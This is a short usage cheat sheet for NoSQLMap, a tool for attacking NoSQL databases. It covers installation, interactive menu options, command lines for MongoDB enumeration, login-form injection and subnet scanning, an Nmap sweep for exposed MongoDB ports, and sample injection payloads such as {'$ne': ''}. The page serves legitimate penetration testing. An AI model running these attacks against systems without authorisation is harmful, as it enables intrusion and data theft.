Description
NoSQLMap is an automated tool for auditing and attacking NoSQL databases (MongoDB, CouchDB, etc.) and web applications using NoSQL. It detects NoSQL injection vulnerabilities and can enumerate/exfiltrate data.
Installation
BASH
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
pip install -r requirements.txt
python nosqlmap.pyBasic Usage
BASH
# Launch interactive mode
python nosqlmap.py
# Options:
# 1 - Set options (target, port, path)
# 2 - NoSQL DB Access Attacks
# 3 - NoSQL Web App attacks
# 4 - Scan for Anonymous MongoDB AccessAdvanced Usage
BASH
# Direct MongoDB enumeration
python nosqlmap.py --attack 2 --victim target.com --port 27017
# Web application NoSQL injection
python nosqlmap.py --attack 3 --victim target.com --uri /login --method POST \
--postData "username=admin&password=test"
# Scan entire subnet for open MongoDB
python nosqlmap.py --attack 4 --victim 10.0.0.0/24Common Workflows
BASH
# Test for NoSQL injection on login forms
# Payloads like: {"$gt": ""}, {"$ne": ""}, {"$regex": ".*"}
python nosqlmap.py
# Combine with Nmap to find exposed MongoDB
nmap -p 27017 --open -sV target.com/24 -oG mongo_hosts.txt
# Then test each host with NoSQLMap